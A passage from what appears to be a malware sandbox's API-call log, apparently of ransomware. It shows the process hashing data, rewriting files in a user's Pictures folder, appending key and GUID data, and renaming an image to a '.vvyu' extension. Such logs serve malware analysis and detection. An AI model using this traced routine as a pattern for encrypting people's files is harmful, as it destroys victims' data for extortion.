szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2f9fa50*=0x31b9f8) returned 1 [0191.364] CryptCreateHash (in: hProv=0x31b9f8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2f9fa58 | out: phHash=0x2f9fa58) returned 1 [0191.364] CryptHashData (hHash=0x2a05de8, pbData=0x2a7d6f0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0191.364] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x0, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x2f9fa54) returned 1 [0191.364] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x2a26b08 [0191.364] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x2a26b08, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x2a26b08, pdwDataLen=0x2f9fa54) returned 1 [0191.364] GetLastError () returned 0x0 [0191.364] CryptDestroyHash (hHash=0x2a05de8) returned 1 [0191.364] CryptReleaseContext (hProv=0x31b9f8, dwFlags=0x0) returned 1 [0191.365] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0191.365] UuidCreate (in: Uuid=0x2f9fa48 | out: Uuid=0x2f9fa48) returned 0x0 [0191.365] UuidToStringA (in: Uuid=0x2f9fa48, StringUuid=0x2f9fa40 | out: StringUuid=0x2f9fa40) returned 0x0 [0191.365] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0191.365] RpcStringFreeA (in: String=0x2f9fa40 | out: String=0x2f9fa40) returned 0x0 [0191.365] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0191.365] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0191.365] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x13b90) returned 0x2af5168 [0191.366] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0191.366] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0191.366] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2adfa00 [0191.366] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0191.366] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2a7d6f0 [0191.366] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9f30 [0191.367] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af3810 [0191.367] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6008 [0191.367] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af3858 [0191.367] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6020 [0191.367] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6050 [0191.367] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae60b0 [0191.367] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6068 [0191.367] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x2a06f58 [0191.367] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x2aebfa0 [0191.367] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2aebfa0, Size=0x218) returned 0x2aee1c8 [0191.367] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x2af3f88 [0191.367] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6050 | out: hHeap=0x2c0000) returned 1 [0191.367] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6068 | out: hHeap=0x2c0000) returned 1 [0191.367] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae60b0 | out: hHeap=0x2c0000) returned 1 [0191.367] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a06f58 | out: hHeap=0x2c0000) returned 1 [0191.368] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0191.368] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae60b0 [0191.368] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7db0 [0191.368] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6068 [0191.368] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ae8 [0191.368] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x2ae6050 [0191.368] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7de0 [0191.368] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x2f5b18 [0191.368] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ba8 [0191.368] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9ed0 [0191.368] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26b08 [0191.368] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x2a19588 [0191.368] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26ac8 [0191.368] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7dc0 [0191.369] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0191.369] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6068 | out: hHeap=0x2c0000) returned 1 [0191.369] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0191.369] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6050 | out: hHeap=0x2c0000) returned 1 [0191.369] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0191.369] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0191.369] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae60b0 | out: hHeap=0x2c0000) returned 1 [0191.369] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0191.370] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9f30 | out: hHeap=0x2c0000) returned 1 [0191.370] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aee1c8 | out: hHeap=0x2c0000) returned 1 [0191.370] GetCurrentThreadId () returned 0x5d8 [0191.370] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae00c8 [0191.370] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x2ae5ad8 [0191.370] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x2a42698 [0191.370] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b9f8 [0191.370] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x2ae2eb8 [0191.370] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7db0 [0191.370] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0191.370] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2adffc0 [0191.370] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0191.371] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0191.371] GetCurrentThreadId () returned 0x5d8 [0191.371] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0191.371] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0191.371] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x2f5b18 [0191.371] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0191.372] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0191.372] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0191.372] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0191.373] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0191.373] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae01d0 [0191.373] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0191.373] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x2a40108 [0191.373] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7db0 [0191.373] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae04e8 [0191.373] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0191.373] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae60b0 [0191.373] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0191.373] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0191.373] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e00 [0191.373] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e10 [0191.373] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e20 [0191.373] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e30 [0191.373] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0191.373] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0191.373] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6050 [0191.374] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0191.374] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e00 [0191.374] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0191.374] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0191.374] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e60 [0191.374] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e70 [0191.374] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e80 [0191.374] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6068 [0191.374] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e70 | out: hHeap=0x2c0000) returned 1 [0191.374] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ae8 [0191.374] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e60 | out: hHeap=0x2c0000) returned 1 [0191.374] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6038 [0191.374] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e80 | out: hHeap=0x2c0000) returned 1 [0191.374] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae60c8 [0191.374] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0191.374] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e40 [0191.374] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0191.374] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6098 [0191.374] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0191.374] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6080 [0191.374] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0191.374] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae60e0 [0191.375] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6080 | out: hHeap=0x2c0000) returned 1 [0191.375] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6080 [0191.375] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6098 | out: hHeap=0x2c0000) returned 1 [0191.375] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e10 [0191.375] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0191.375] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26aa8 [0191.375] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0191.375] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1c) returned 0x2ad7ba8 [0191.375] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6050 | out: hHeap=0x2c0000) returned 1 [0191.375] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6050 [0191.375] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0191.375] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x2af3f88 [0191.375] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae60b0 | out: hHeap=0x2c0000) returned 1 [0191.375] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a198d0 [0191.375] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae60e0 | out: hHeap=0x2c0000) returned 1 [0191.375] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x2af4198 [0191.375] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0191.375] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x2f5b18 [0191.375] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0191.375] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a197b8 [0191.376] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6050 | out: hHeap=0x2c0000) returned 1 [0191.376] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x2af43b0 [0191.376] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a198d0 | out: hHeap=0x2c0000) returned 1 [0191.376] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae03e0 [0191.376] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0191.377] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f8 | out: hHeap=0x2c0000) returned 1 [0191.377] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae01d0 | out: hHeap=0x2c0000) returned 1 [0191.378] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae03e0 | out: hHeap=0x2c0000) returned 1 [0191.378] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26aa8 | out: hHeap=0x2c0000) returned 1 [0191.378] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a197b8 | out: hHeap=0x2c0000) returned 1 [0191.379] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af4198 | out: hHeap=0x2c0000) returned 1 [0191.379] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af43b0 | out: hHeap=0x2c0000) returned 1 [0191.379] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0191.379] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0191.379] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6080 | out: hHeap=0x2c0000) returned 1 [0191.379] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0191.379] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae60c8 | out: hHeap=0x2c0000) returned 1 [0191.379] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0191.380] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6068 | out: hHeap=0x2c0000) returned 1 [0191.380] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6038 | out: hHeap=0x2c0000) returned 1 [0191.380] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2eb8 | out: hHeap=0x2c0000) returned 1 [0191.380] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0191.381] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adffc0 | out: hHeap=0x2c0000) returned 1 [0191.381] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6020 | out: hHeap=0x2c0000) returned 1 [0191.381] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3858 | out: hHeap=0x2c0000) returned 1 [0191.381] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0191.382] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae04e8 | out: hHeap=0x2c0000) returned 1 [0191.382] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40108 | out: hHeap=0x2c0000) returned 1 [0191.382] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a19588 | out: hHeap=0x2c0000) returned 1 [0191.382] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26b08 | out: hHeap=0x2c0000) returned 1 [0191.382] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0191.382] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0191.382] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9ed0 | out: hHeap=0x2c0000) returned 1 [0191.383] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0191.383] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0191.383] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adfa00 | out: hHeap=0x2c0000) returned 1 [0191.383] WriteFile (in: hFile=0x584, lpBuffer=0x2af5168*, nNumberOfBytesToWrite=0x13b83, lpNumberOfBytesWritten=0x2f9fb14, lpOverlapped=0x0 | out: lpBuffer=0x2af5168*, lpNumberOfBytesWritten=0x2f9fb14*=0x13b83, lpOverlapped=0x0) returned 1 [0191.385] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af5168 | out: hHeap=0x2c0000) returned 1 [0191.385] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x13b88, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0191.385] WriteFile (in: hFile=0x584, lpBuffer=0x2ae00c8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ae00c8*, lpNumberOfBytesWritten=0x2f9fb50*=0x100, lpOverlapped=0x0) returned 1 [0191.385] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae00c8 | out: hHeap=0x2c0000) returned 1 [0191.385] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ee78 [0191.385] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x428) returned 0x2af3f88 [0191.385] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2af3f88, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0191.385] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x430) returned 0x2af43b8 [0191.386] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0191.386] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ee78 | out: hHeap=0x2c0000) returned 1 [0191.386] WriteFile (in: hFile=0x584, lpBuffer=0x2af43b8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2af43b8*, lpNumberOfBytesWritten=0x2f9fb50*=0x28, lpOverlapped=0x0) returned 1 [0191.386] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af43b8 | out: hHeap=0x2c0000) returned 1 [0191.386] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0191.387] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x2f9fb50*=0x26, lpOverlapped=0x0) returned 1 [0191.387] CloseHandle (hObject=0x584) returned 1 [0191.388] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbcb0 [0191.388] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x880) returned 0x2af3f88 [0191.389] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbcb0 | out: hHeap=0x2c0000) returned 1 [0191.389] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Pictures\\Ujyi1dWdud6-J7Pcelmb.png" (normalized: "c:\\users\\keecfmwgj\\pictures\\ujyi1dwdud6-j7pcelmb.png"), lpNewFileName="C:\\Users\\kEecfMwgj\\Pictures\\Ujyi1dWdud6-J7Pcelmb.png.vvyu" (normalized: "c:\\users\\keecfmwgj\\pictures\\ujyi1dwdud6-j7pcelmb.png.vvyu")) returned 1 [0191.390] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0191.390] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0191.390] VirtualFree (lpAddress=0x2620000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0191.393] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbb48 | out: hHeap=0x2c0000) returned 1 [0191.393] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x86422fb0, ftCreationTime.dwHighDateTime=0x1d8a726, ftLastAccessTime.dwLowDateTime=0x9a6f6b30, ftLastAccessTime.dwHighDateTime=0x1d8a738, ftLastWriteTime.dwLowDateTime=0x9a6f6b30, ftLastWriteTime.dwHighDateTime=0x1d8a738, nFileSizeHigh=0x0, nFileSizeLow=0x4c0d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="vaUZY4mlwUOC1Eph.bmp", cAlternateFileName="VAUZY4~1.BMP")) returned 1 [0191.393] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af3858 [0191.393] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbb48 [0191.394] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3858 | out: hHeap=0x2c0000) returned 1 [0191.394] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Pictures\\vaUZY4mlwUOC1Eph.bmp") returned=".bmp" [0191.394] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\vaUZY4mlwUOC1Eph.bmp" (normalized: "c:\\users\\keecfmwgj\\pictures\\vauzy4mlwuoc1eph.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0191.396] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x2f9fb40 | out: lpFileSize=0x2f9fb40*=19469) returned 1 [0191.396] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2620000 [0191.400] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x4be7, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0191.400] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x2f9fb78, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb78*=0x26, lpOverlapped=0x0) returned 1 [0191.402] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ba8 [0191.402] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0191.403] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0191.403] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x2f9fb70, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb70*=0x4c0d, lpOverlapped=0x0) returned 1 [0191.404] lstrlenA (lpString="-----BEGIN PUBLIC 